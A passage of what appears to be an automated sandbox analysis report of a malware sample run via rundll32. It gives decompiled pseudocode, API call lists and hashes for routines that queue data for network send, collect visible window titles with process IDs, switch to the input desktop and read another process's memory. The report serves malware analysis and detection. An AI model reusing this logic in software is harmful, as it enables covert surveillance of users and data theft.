                                                            						if(_t63 != 0) {
                                                            							 *(_t71 + 0x168) = 0;
                                                            							 *(_t71 + 0x16c) = 0;
                                                            							goto L6;
                                                            						}
                                                            					} else {
                                                            						_t53 =  *(_t63 + 4);
                                                            						 *(_t71 + 0x168) = _t53;
                                                            						 *(_t53 + 8) = 0;
                                                            						L6:
                                                            						if(_t63 != 0) {
                                                            							 *(_t63 + 4) = 0;
                                                            							 *(_t63 + 8) = 0;
                                                            							 *((intOrPtr*)(_t71 + 0x164)) =  *((intOrPtr*)(_t71 + 0x164)) - 1;
                                                            						}
                                                            					}
                                                            					LeaveCriticalSection(_t76);
                                                            					if(_t63 == 0) {
                                                            						break;
                                                            					} else {
                                                            						_t66 =  *((intOrPtr*)(_t63 + 0x14));
                                                            						_t43 =  *((intOrPtr*)(_t63 + 0x18)) - _t66;
                                                            						__imp__#19( *((intOrPtr*)(_t71 + 0x1c)), _t66, _t43, 0);
                                                            						_v24 = _t43;
                                                            						if(_t43 <= 0) {
                                                            							if(_t43 == 0xffffffff) {
                                                            								__imp__#111();
                                                            								if(_t43 != 0x2733) {
                                                            									_t36 = _t71 + 0x84; // 0x85
                                                            									 *((intOrPtr*)(_t71 + 0xc)) = 1;
                                                            									 *((intOrPtr*)(_t71 + 0x10)) = 3;
                                                            									 *((intOrPtr*)(_t71 + 0x14)) = _t43;
                                                            									 *((intOrPtr*)(_t71 + 0x18)) = 1;
                                                            									_t44 = E0464C930(_t36, _t63);
                                                            									if(_t44 == 0) {
                                                            										HeapFree( *( *_t63), _t44, _t63);
                                                            									}
                                                            									return 0;
                                                            								} else {
                                                            									_t25 = _t71 + 0x14c; // 0x14d
                                                            									_t78 = _t25;
                                                            									EnterCriticalSection(_t78);
                                                            									_t50 =  *(_t71 + 0x168);
                                                            									if(_t50 == 0) {
                                                            										 *(_t63 + 8) = 0;
                                                            										 *(_t63 + 4) = 0;
                                                            										 *(_t71 + 0x16c) = _t63;
                                                            									} else {
                                                            										 *(_t50 + 8) = _t63;
                                                            										 *(_t63 + 4) =  *(_t71 + 0x168);
                                                            									}
                                                            									 *((intOrPtr*)(_t71 + 0x164)) =  *((intOrPtr*)(_t71 + 0x164)) + 1;
                                                            									 *(_t71 + 0x168) = _t63;
                                                            									LeaveCriticalSection(_t78);
                                                            									break;
                                                            								}
                                                            							} else {
                                                            								goto L12;
                                                            							}
                                                            						} else {
                                                            							EnterCriticalSection(_t76);
                                                            							 *((intOrPtr*)(_t71 + 0x180)) =  *((intOrPtr*)(_t71 + 0x180)) - _v28;
                                                            							LeaveCriticalSection(_t76);
                                                            							SetLastError(0);
                                                            							 *((intOrPtr*)( *_t71 + 0x84))( *((intOrPtr*)(_t63 + 0x14)), _v28);
                                                            							L12:
                                                            							_t24 = _t71 + 0x84; // 0x85
                                                            							_t52 = E0464C930(_t24, _t63);
                                                            							if(_t52 == 0) {
                                                            								HeapFree( *( *_t63), _t52, _t63);
                                                            							}
                                                            							continue;
                                                            						}
                                                            					}
                                                            					L23:
                                                            				}
                                                            				return 1;
                                                            				goto L23;
                                                            			}















                                                            0x0464e546
                                                            0x0464e54a
                                                            0x0464e550
                                                            0x0464e55d
                                                            0x0464e55d
                                                            0x0464e564
                                                            0x0464e56a
                                                            0x0464e576
                                                            0x0464e58c
                                                            0x0464e58e
                                                            0x0464e598
                                                            0x00000000
                                                            0x0464e598
                                                            0x0464e578
                                                            0x0464e578
                                                            0x0464e57b
                                                            0x0464e581
                                                            0x0464e5a2
                                                            0x0464e5a4
                                                            0x0464e5a6
                                                            0x0464e5ad
                                                            0x0464e5b4
                                                            0x0464e5b4
                                                            0x0464e5a4
                                                            0x0464e5bb
                                                            0x0464e5c3
                                                            0x00000000
                                                            0x0464e5c9
                                                            0x0464e5c9
                                                            0x0464e5d1
                                                            0x0464e5d8
                                                            0x0464e5de
                                                            0x0464e5e4
                                                            0x0464e61d
                                                            0x0464e644
                                                            0x0464e64f
                                                            0x0464e6ab
                                                            0x0464e6b1
                                                            0x0464e6b8
                                                            0x0464e6bf
                                                            0x0464e6c2
                                                            0x0464e6c9
                                                            0x0464e6d0
                                                            0x0464e6d8
                                                            0x0464e6d8
                                                            0x0464e6e6
                                                            0x0464e651
                                                            0x0464e656
                                                            0x0464e656
                                                            0x0464e65d
                                                            0x0464e65f
                                                            0x0464e667
                                                            0x0464e677
                                                            0x0464e67e
                                                            0x0464e685
                                                            0x0464e669
                                                            0x0464e669
                                                            0x0464e672
                                                            0x0464e672
                                                            0x0464e68b
                                                            0x0464e692
                                                            0x0464e698
                                                            0x00000000
                                                            0x0464e698
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464e5e6
                                                            0x0464e5ec
                                                            0x0464e5f2
                                                            0x0464e5f9
                                                            0x0464e601
                                                            0x0464e612
                                                            0x0464e61f
                                                            0x0464e620
                                                            0x0464e626
                                                            0x0464e62d
                                                            0x0464e639
                                                            0x0464e639
                                                            0x00000000
                                                            0x0464e62d
                                                            0x0464e5e4
                                                            0x00000000
                                                            0x0464e5c3
                                                            0x0464e6a9
                                                            0x00000000

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(0000014D), ref: 0464E564
                                                            • RtlLeaveCriticalSection.NTDLL(0000014D), ref: 0464E5BB
                                                            • send.WS2_32(?,00000000,00000001,00000000), ref: 0464E5D8
                                                            • RtlLeaveCriticalSection.NTDLL(0000014D), ref: 0464E5F9
                                                            • SetLastError.KERNEL32(00000000), ref: 0464E601
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?), ref: 0464E639
                                                            • WSAGetLastError.WS2_32 ref: 0464E644
                                                            • RtlLeaveCriticalSection.NTDLL(0000014D), ref: 0464E698
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?), ref: 0464E6D8
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$ErrorFreeHeapLast$Entersend
                                                            • String ID:
                                                            • API String ID: 1657114447-0
                                                            • Opcode ID: c0e2e3ccab058869cccefebda6c0441b07fe36be1288c0f711366e14c504234f
                                                            • Instruction ID: 4328777342efe0ab07314fd503a3d5251a15e833d0d18c7a709d25efbd41e780
                                                            • Opcode Fuzzy Hash: c0e2e3ccab058869cccefebda6c0441b07fe36be1288c0f711366e14c504234f
                                                            • Instruction Fuzzy Hash: 48415D71300601EFDB488F65D888BA6FBA8FF55314F008259E919CB250FB76B865CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E046450C0(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4, void** _a8) {
                                                            				signed int _v8;
                                                            				short _v2056;
                                                            				void** _v2060;
                                                            				signed int _t18;
                                                            				void** _t20;
                                                            				signed int _t36;
                                                            				struct HWND__* _t44;
                                                            				void* _t50;
                                                            				void* _t51;
                                                            				void* _t52;
                                                            				int _t53;
                                                            				DWORD* _t54;
                                                            				signed int _t56;
                                                            
                                                            				_t52 = __esi;
                                                            				_t18 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t18 ^ _t56;
                                                            				_t20 = _a8;
                                                            				_t44 = _a4;
                                                            				_t50 =  *_t20;
                                                            				_v2060 = _t20;
                                                            				E0465DEA0(_t50,  &_v2056, 0, 0x400);
                                                            				GetWindowTextW(_t44,  &_v2056, 0x3ff);
                                                            				if(IsWindowVisible(_t44) != 0 && lstrlenW( &_v2056) != 0) {
                                                            					if(_t50 == 0) {
                                                            						_t50 = LocalAlloc(0x40, 1);
                                                            					}
                                                            					_push(_t52);
                                                            					_t53 = LocalSize(_t50);
                                                            					_t51 = LocalReAlloc(_t50, 6 + lstrlenW( &_v2056) * 2 + _t53, 0x42);
                                                            					_t54 = _t53 + _t51;
                                                            					GetWindowThreadProcessId(_t44, _t54);
                                                            					_t36 = lstrlenW( &_v2056);
                                                            					_t15 =  &(_t54[1]); // 0x4
                                                            					E0465E060(_t15,  &_v2056, 2 + _t36 * 2);
                                                            					 *_v2060 = _t51;
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t56);
                                                            			}
















                                                            0x046450c0
                                                            0x046450c9
                                                            0x046450d0
                                                            0x046450d3
                                                            0x046450d7
                                                            0x046450db
                                                            0x046450e2
                                                            0x046450f1
                                                            0x04645106
                                                            0x04645115
                                                            0x0464512e
                                                            0x0464513a
                                                            0x0464513a
                                                            0x0464513c
                                                            0x04645144
                                                            0x04645166
                                                            0x04645168
                                                            0x0464516c
                                                            0x04645179
                                                            0x0464518e
                                                            0x04645192
                                                            0x046451a0
                                                            0x046451a2
                                                            0x046451b4

                                                            APIs
                                                            • GetWindowTextW.USER32(?,?,000003FF), ref: 04645106
                                                            • IsWindowVisible.USER32(?), ref: 0464510D
                                                            • lstrlenW.KERNEL32(?), ref: 04645122
                                                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 04645134
                                                            • LocalSize.KERNEL32 ref: 0464513E
                                                            • lstrlenW.KERNEL32(?), ref: 0464514D
                                                            • LocalReAlloc.KERNEL32(?,?,00000042), ref: 04645160
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0464516C
                                                            • lstrlenW.KERNEL32(?,?,?,00000042), ref: 04645179
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LocalWindowlstrlen$Alloc$ProcessSizeTextThreadVisible
                                                            • String ID:
                                                            • API String ID: 925664022-0
                                                            • Opcode ID: 6a006e9c3cd86e99e21b33cbc4994fa21c595587ab9df885d6f0f5c7035646e0
                                                            • Instruction ID: 3b2440b0939c45a303da0bc50da3f32ac3fe199f6fc78dd2e086a79f9fddad04
                                                            • Opcode Fuzzy Hash: 6a006e9c3cd86e99e21b33cbc4994fa21c595587ab9df885d6f0f5c7035646e0
                                                            • Instruction Fuzzy Hash: 8E2171B6540208ABDB10DF65EC4CF9A77FCFB44711F045065FA4AD7140FE39A9488BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 95%
                                                            			E04645570(void* __ebx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				char _v264;
                                                            				char _v520;
                                                            				long _v524;
                                                            				struct HDESK__* _v528;
                                                            				signed int _t13;
                                                            				struct HDESK__* _t41;
                                                            				void* _t43;
                                                            				signed int _t46;
                                                            
                                                            				_t13 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t13 ^ _t46;
                                                            				_t43 = GetThreadDesktop(GetCurrentThreadId());
                                                            				_v528 = _t43;
                                                            				E0465DEA0(__edi,  &_v264, 0, 0x100);
                                                            				GetUserObjectInformationA(_t43, 2,  &_v264, 0x100,  &_v524);
                                                            				_t41 = OpenInputDesktop(0, 0, 0x2000000);
                                                            				E0465DEA0(_t41,  &_v520, 0, 0x100);
                                                            				GetUserObjectInformationA(_t41, 2,  &_v520, 0x100,  &_v524);
                                                            				if(lstrcmpiA( &_v520,  &_v264) != 0) {
                                                            					SetThreadDesktop(_t41);
                                                            				}
                                                            				CloseDesktop(_v528);
                                                            				CloseDesktop(_t41);
                                                            				return E04655AFE(_v8 ^ _t46);
                                                            			}












                                                            0x04645579
                                                            0x04645580
                                                            0x04645595
                                                            0x046455a5
                                                            0x046455ab
                                                            0x046455cf
                                                            0x046455e5
                                                            0x046455f0
                                                            0x0464560e
                                                            0x04645626
                                                            0x04645629
                                                            0x0464562f
                                                            0x0464563d
                                                            0x04645640
                                                            0x04645654

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 04645588
                                                            • GetThreadDesktop.USER32(00000000), ref: 0464558F
                                                            • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 046455CF
                                                            • OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 046455DA
                                                            • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 0464560E
                                                            • lstrcmpi.KERNEL32(?,?), ref: 0464561E
                                                            • SetThreadDesktop.USER32(00000000), ref: 04645629
                                                            • CloseDesktop.USER32(?), ref: 0464563D
                                                            • CloseDesktop.USER32(00000000), ref: 04645640
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Desktop$Thread$CloseInformationObjectUser$CurrentInputOpenlstrcmpi
                                                            • String ID:
                                                            • API String ID: 3718465862-0
                                                            • Opcode ID: a4086ffc409b9531222739722647a557f2c4fd7939beaf79d4577f762fb9f575
                                                            • Instruction ID: d99b7cd76904fa238be0adf8f99fb6944cf55353230231f9f6200034e8fbaaec
                                                            • Opcode Fuzzy Hash: a4086ffc409b9531222739722647a557f2c4fd7939beaf79d4577f762fb9f575
                                                            • Instruction Fuzzy Hash: 662166B69402187BEB11AB60DC4DFEA777CEB04710F100196FA05E7181EEB46E849F90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E046426C0(intOrPtr* __ecx) {
                                                            				int _t29;
                                                            				intOrPtr* _t33;
                                                            				void* _t34;
                                                            				struct HICON__** _t37;
                                                            				void* _t38;
                                                            
                                                            				_t33 = __ecx;
                                                            				 *__ecx = 0x467ecb4;
                                                            				ReleaseDC( *(__ecx + 0x104),  *(__ecx + 0x3c));
                                                            				DeleteDC( *(_t33 + 0x40));
                                                            				DeleteDC( *(_t33 + 0x44));
                                                            				DeleteDC( *(_t33 + 0x48));
                                                            				DeleteDC( *(_t33 + 0x78));
                                                            				DeleteObject( *(_t33 + 0x4c));
                                                            				DeleteObject( *(_t33 + 0x50));
                                                            				DeleteObject( *(_t33 + 0x7c));
                                                            				_t25 =  *((intOrPtr*)(_t33 + 0x14));
                                                            				if( *((intOrPtr*)(_t33 + 0x14)) != 0) {
                                                            					L04655B0F(_t25);
                                                            					_t38 = _t38 + 4;
                                                            				}
                                                            				L04655B0F( *((intOrPtr*)(_t33 + 0x60)));
                                                            				L04655B0F( *((intOrPtr*)(_t33 + 0x5c)));
                                                            				L04655B0F( *((intOrPtr*)(_t33 + 0x64)));
                                                            				_t37 = _t33 + 0xc4;
                                                            				 *((intOrPtr*)(_t33 + 0x80)) = 0x467ec9c;
                                                            				_t34 = 0x10;
                                                            				do {
                                                            					_t29 = DestroyCursor( *_t37);
                                                            					_t37 =  &(_t37[1]);
                                                            					_t34 = _t34 - 1;
                                                            				} while (_t34 != 0);
                                                            				return _t29;
                                                            			}








                                                            0x046426c3
                                                            0x046426c8
                                                            0x046426d4
                                                            0x046426e3
                                                            0x046426e8
                                                            0x046426ed
                                                            0x046426f2
                                                            0x046426fd
                                                            0x04642702
                                                            0x04642707
                                                            0x04642709
                                                            0x0464270e
                                                            0x04642711
                                                            0x04642716
                                                            0x04642716
                                                            0x0464271c
                                                            0x04642724
                                                            0x0464272c
                                                            0x04642737
                                                            0x0464273d
                                                            0x0464274a
                                                            0x04642750
                                                            0x04642752
                                                            0x04642754
                                                            0x04642757
                                                            0x04642757
                                                            0x0464275f

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Delete$Object$CursorDestroyRelease
                                                            • String ID:
                                                            • API String ID: 1665608007-0
                                                            • Opcode ID: 6f71a6a29f398cfe2f180d1fb04043c230477e2e05371b7351254df928966877
                                                            • Instruction ID: 54cb81e0c1caf67fe042eb03aa2527b9c5c6c7f25498dbc268f3e3c0a582ca9b
                                                            • Opcode Fuzzy Hash: 6f71a6a29f398cfe2f180d1fb04043c230477e2e05371b7351254df928966877
                                                            • Instruction Fuzzy Hash: 22113972A00526FBDB266F25DD08985BF66FF00254B000122E91953634EB32BC34EFD0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 25%
                                                            			E04635D7C(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a12) {
                                                            				signed int _v8;
                                                            				intOrPtr _v12;
                                                            				intOrPtr _v16;
                                                            				char _v32;
                                                            				intOrPtr _v72;
                                                            				intOrPtr _v76;
                                                            				char _v84;
                                                            				intOrPtr _v976;
                                                            				intOrPtr _v980;
                                                            				signed int _v988;
                                                            				char _v1100;
                                                            				intOrPtr _v1968;
                                                            				intOrPtr _v1972;
                                                            				char _v2004;
                                                            				intOrPtr _v2008;
                                                            				char _v2012;
                                                            				intOrPtr _v2016;
                                                            				signed int _t61;
                                                            				struct HINSTANCE__* _t63;
                                                            				struct HINSTANCE__* _t65;
                                                            				signed int _t86;
                                                            				intOrPtr* _t110;
                                                            				intOrPtr* _t114;
                                                            				intOrPtr _t133;
                                                            				intOrPtr* _t135;
                                                            				intOrPtr* _t140;
                                                            				intOrPtr _t143;
                                                            				void* _t144;
                                                            				signed int _t147;
                                                            				void* _t151;
                                                            				signed int _t152;
                                                            				intOrPtr _t175;
                                                            
                                                            				_t114 = __ecx;
                                                            				L04655B81(_a12);
                                                            				_t152 = _t151 + 4;
                                                            				E0465DE28(0, 0);
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				_t147 = _t152;
                                                            				_t61 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t61 ^ _t147;
                                                            				_push(__esi);
                                                            				_v2016 = __edx;
                                                            				_t135 = _t114;
                                                            				_t63 = GetModuleHandleA("ntdll.dll");
                                                            				if(_t63 != 0) {
                                                            					L4:
                                                            					_t140 = GetProcAddress(_t63, "NtWow64QueryInformationProcess64");
                                                            				} else {
                                                            					_t63 = LoadLibraryA("ntdll.dll");
                                                            					if(_t63 != 0) {
                                                            						goto L4;
                                                            					} else {
                                                            						_t140 = 0;
                                                            					}
                                                            				}
                                                            				_t65 = GetModuleHandleA("ntdll.dll");
                                                            				if(_t65 != 0) {
                                                            					L8:
                                                            					_t110 = GetProcAddress(_t65, "NtWow64ReadVirtualMemory64");
                                                            				} else {
                                                            					_t65 = LoadLibraryA("ntdll.dll");
                                                            					if(_t65 != 0) {
                                                            						goto L8;
                                                            					} else {
                                                            						_t110 = 0;
                                                            					}
                                                            				}
                                                            				if(_t140 == 0 || _t110 == 0) {
                                                            					 *((intOrPtr*)(_t135 + 0x14)) = 7;
                                                            					 *((intOrPtr*)(_t135 + 0x10)) = 0;
                                                            					 *_t135 = 0;
                                                            					E046332A0(_t135, 0x467c5d0);
                                                            					__eflags = _v8 ^ _t147;
                                                            					return E04655AFE(_v8 ^ _t147, 0);
                                                            				} else {
                                                            					E0465DEA0(_t135,  &_v84, 0, 0x30);
                                                            					asm("xorps xmm0, xmm0");
                                                            					asm("movlpd [ebp-0x7d8], xmm0");
                                                            					_push( &_v2012);
                                                            					_push(0x30);
                                                            					_push( &_v84);
                                                            					_push(0);
                                                            					_push(_v2016);
                                                            					if( *_t140() < 0 || _v2012 != 0x30 || _v2008 != 0) {
                                                            						L25:
                                                            						E046331B0(_t135, _t135, 0x467c5d0);
                                                            						__eflags = _v8 ^ _t147;
                                                            						return E04655AFE(_v8 ^ _t147);
                                                            					} else {
                                                            						_t143 = _v2016;
                                                            						_push( &_v2012);
                                                            						_push(0);
                                                            						_push(0x388);
                                                            						_push( &_v2004);
                                                            						_push(_v72);
                                                            						_push(_v76);
                                                            						_push(_t143);
                                                            						if( *_t110() < 0 || _v2012 != 0x388 || _v2008 != 0) {
                                                            							goto L25;
                                                            						} else {
                                                            							_push( &_v2012);
                                                            							_push(0);
                                                            							_push(0x3f8);
                                                            							_push( &_v1100);
                                                            							_push(_v1968);
                                                            							_push(_v1972);
                                                            							_push(_t143);
                                                            							if( *_t110() < 0 || _v2012 != 0x3f8) {
                                                            								goto L25;
                                                            							} else {
                                                            								_t175 = _v2008;
                                                            								if(_t175 != 0) {
                                                            									goto L25;
                                                            								} else {
                                                            									_t86 = (_v988 & 0x0000ffff) + 1;
                                                            									_t144 = L04655B55( ~(_t175 > 0) | _t86 * 0x00000002, _t143, _t175);
                                                            									E0465DEA0(_t135, _t144, 0, 2 + (_v988 & 0x0000ffff) * 2);
                                                            									asm("cdq");
                                                            									 *_t110(_v2016, _v980, _v976, _t144, _v988 & 0x0000ffff, _t86 * 2 >> 0x20,  &_v2012,  ~(_t175 > 0) | _t86 * 0x00000002);
                                                            									E046331B0( &_v32, _t135, _t144);
                                                            									L04655B0F(_t144);
                                                            									 *((intOrPtr*)(_t135 + 0x14)) = 7;
                                                            									 *((intOrPtr*)(_t135 + 0x10)) = 0;
                                                            									 *_t135 = 0;
                                                            									_t133 = _v12;
                                                            									if(_t133 >= 8) {
                                                            										 *_t135 = _v32;
                                                            										_v32 = 0;
                                                            									} else {
                                                            										_t104 = _v16 + 1;
                                                            										if(_v16 + 1 != 0) {
                                                            											E0465D060(_t135,  &_v32, _t104 + _t104);
                                                            											_t133 = _v12;
                                                            										}
                                                            									}
                                                            									 *((intOrPtr*)(_t135 + 0x10)) = _v16;
                                                            									 *((intOrPtr*)(_t135 + 0x14)) = _t133;
                                                            									_v12 = 7;
                                                            									_v16 = 0;
                                                            									_v32 = 0;
                                                            									E04633170( &_v32);
                                                            									return E04655AFE(_v8 ^ _t147);
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}



































                                                            0x04635d7c
                                                            0x04635d7f
                                                            0x04635d84
                                                            0x04635d8b
                                                            0x04635d90
                                                            0x04635d91
                                                            0x04635d92
                                                            0x04635d93
                                                            0x04635d94
                                                            0x04635d95
                                                            0x04635d96
                                                            0x04635d97
                                                            0x04635d98
                                                            0x04635d99
                                                            0x04635d9a
                                                            0x04635d9b
                                                            0x04635d9c
                                                            0x04635d9d
                                                            0x04635d9e
                                                            0x04635d9f
                                                            0x04635da1
                                                            0x04635da9
                                                            0x04635db0
                                                            0x04635db4
                                                            0x04635dbb
                                                            0x04635dc1
                                                            0x04635dc3
                                                            0x04635dd1
                                                            0x04635de2
                                                            0x04635dee
                                                            0x04635dd3
                                                            0x04635dd8
                                                            0x04635ddc
                                                            0x00000000
                                                            0x04635dde
                                                            0x04635dde
                                                            0x04635dde
                                                            0x04635ddc
                                                            0x04635df5
                                                            0x04635dfd
                                                            0x04635e0e
                                                            0x04635e1a
                                                            0x04635dff
                                                            0x04635e04
                                                            0x04635e08
                                                            0x00000000
                                                            0x04635e0a
                                                            0x04635e0a
                                                            0x04635e0a
                                                            0x04635e08
                                                            0x04635e1e
                                                            0x04636021
                                                            0x04636029
                                                            0x04636037
                                                            0x0463603a
                                                            0x04636046
                                                            0x04636051
                                                            0x04635e2c
                                                            0x04635e34
                                                            0x04635e42
                                                            0x04635e45
                                                            0x04635e4d
                                                            0x04635e4e
                                                            0x04635e53
                                                            0x04635e54
                                                            0x04635e56
                                                            0x04635e60
                                                            0x04636000
                                                            0x04636007
                                                            0x04636014
                                                            0x0463601e
                                                            0x04635e80
                                                            0x04635e80
                                                            0x04635e8c
                                                            0x04635e8d
                                                            0x04635e8f
                                                            0x04635e9a
                                                            0x04635e9b
                                                            0x04635e9e
                                                            0x04635ea1
                                                            0x04635ea6
                                                            0x00000000
                                                            0x04635ec9
                                                            0x04635ecf
                                                            0x04635ed0
                                                            0x04635ed2
                                                            0x04635edd
                                                            0x04635ede
                                                            0x04635ee4
                                                            0x04635eea
                                                            0x04635eef
                                                            0x00000000
                                                            0x04635f05
                                                            0x04635f05
                                                            0x04635f0c
                                                            0x00000000
                                                            0x04635f12
                                                            0x04635f1b
                                                            0x04635f30
                                                            0x04635f44
                                                            0x04635f5a
                                                            0x04635f70
                                                            0x04635f76
                                                            0x04635f7c
                                                            0x04635f83
                                                            0x04635f8a
                                                            0x04635f94
                                                            0x04635f97
                                                            0x04635f9d
                                                            0x04635fbf
                                                            0x04635fc1
                                                            0x04635f9f
                                                            0x04635fa2
                                                            0x04635fa5
                                                            0x04635faf
                                                            0x04635fb4
                                                            0x04635fb7
                                                            0x04635fa5
                                                            0x04635fcd
                                                            0x04635fd3
                                                            0x04635fd6
                                                            0x04635fdd
                                                            0x04635fe4
                                                            0x04635fe8
                                                            0x04635fff
                                                            0x04635fff
                                                            0x04635f0c
                                                            0x04635eef
                                                            0x04635ea6
                                                            0x04635e60

                                                            APIs
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 04635D8B
                                                              • Part of subcall function 0465DE28: RaiseException.KERNEL32(?,?,?,04656A2F,769C4560,00000000,?,?,?,?,?,?,04656A2F,04655B38,0468160C,04655B38), ref: 0465DE87
                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04635DC3
                                                            • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04635DD8
                                                            • GetProcAddress.KERNEL32(00000000,NtWow64QueryInformationProcess64), ref: 04635DE8
                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04635DF5
                                                            • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04635E04
                                                            • GetProcAddress.KERNEL32(00000000,NtWow64ReadVirtualMemory64), ref: 04635E14
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressHandleLibraryLoadModuleProc$ExceptionException@8RaiseThrow
                                                            • String ID: 0$ntdll.dll
                                                            • API String ID: 3650064235-1737626548
                                                            • Opcode ID: 5b99ee3e4ae63da359c3e7322b58e8e7e84aa451fb910da8f628b38dba9d4072
                                                            • Instruction ID: 64e15e5c903bdfa87f058a61b9e2ae92c7417107ef1d85bf5d66015b861128bb
                                                            • Opcode Fuzzy Hash: 5b99ee3e4ae63da359c3e7322b58e8e7e84aa451fb910da8f628b38dba9d4072
                                                            • Instruction Fuzzy Hash: EC51A971D04259BFEB619F60DD45BAEB3B8EF04305F4040AAE909A6180FB74BA84CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 92%
                                                            			E04645DD0(void* __ebx, short* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8) {
                                                            				signed int _v8;
                                                            				short _v528;
                                                            				void* _v532;
                                                            				int _v536;
                                                            				short* _v540;
                                                            				void* _v544;
                                                            				int _v548;
                                                            				int _v552;
                                                            				intOrPtr _v556;
                                                            				intOrPtr _v560;
                                                            				signed int _t45;
                                                            				intOrPtr _t47;
                                                            				intOrPtr _t48;
                                                            				intOrPtr _t49;
                                                            				short _t50;
                                                            				int _t54;
                                                            				signed int _t81;
                                                            				signed int _t82;
                                                            				signed int _t83;
                                                            				signed int _t88;
                                                            				short* _t89;
                                                            				signed int _t90;
                                                            				signed int _t91;
                                                            				signed short* _t94;
                                                            				signed short* _t95;
                                                            				signed short* _t96;
                                                            				short* _t98;
                                                            				void* _t100;
                                                            				void* _t102;
                                                            				intOrPtr* _t104;
                                                            				void* _t105;
                                                            				intOrPtr* _t107;
                                                            				void* _t108;
                                                            				signed int _t109;
                                                            				void* _t110;
                                                            				void* _t111;
                                                            				void* _t113;
                                                            				void* _t114;
                                                            
                                                            				_t89 = __ecx;
                                                            				_t45 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t45 ^ _t109;
                                                            				_t47 =  *0x467e690; // 0x2a
                                                            				_t107 = _a4;
                                                            				_t104 = _a8;
                                                            				 *((intOrPtr*)(__edx)) = _t47;
                                                            				_t48 =  *0x467e690; // 0x2a
                                                            				_v556 = __edx;
                                                            				_t98 =  &(__ecx[1]);
                                                            				 *_t104 = _t48;
                                                            				_t49 =  *0x467e690; // 0x2a
                                                            				_v540 = __ecx;
                                                            				_v560 = _t104;
                                                            				 *_t107 = _t49;
                                                            				do {
                                                            					_t50 =  *_t89;
                                                            					_t89 =  &(_t89[1]);
                                                            				} while (_t50 != 0);
                                                            				_t90 = _t89 - _t98;
                                                            				_t91 = _t90 >> 1;
                                                            				if(_t90 != 0) {
                                                            					_t54 = GetFileVersionInfoSizeW(_v540,  &_v552);
                                                            					_v548 = _t54;
                                                            					_t118 = _t54;
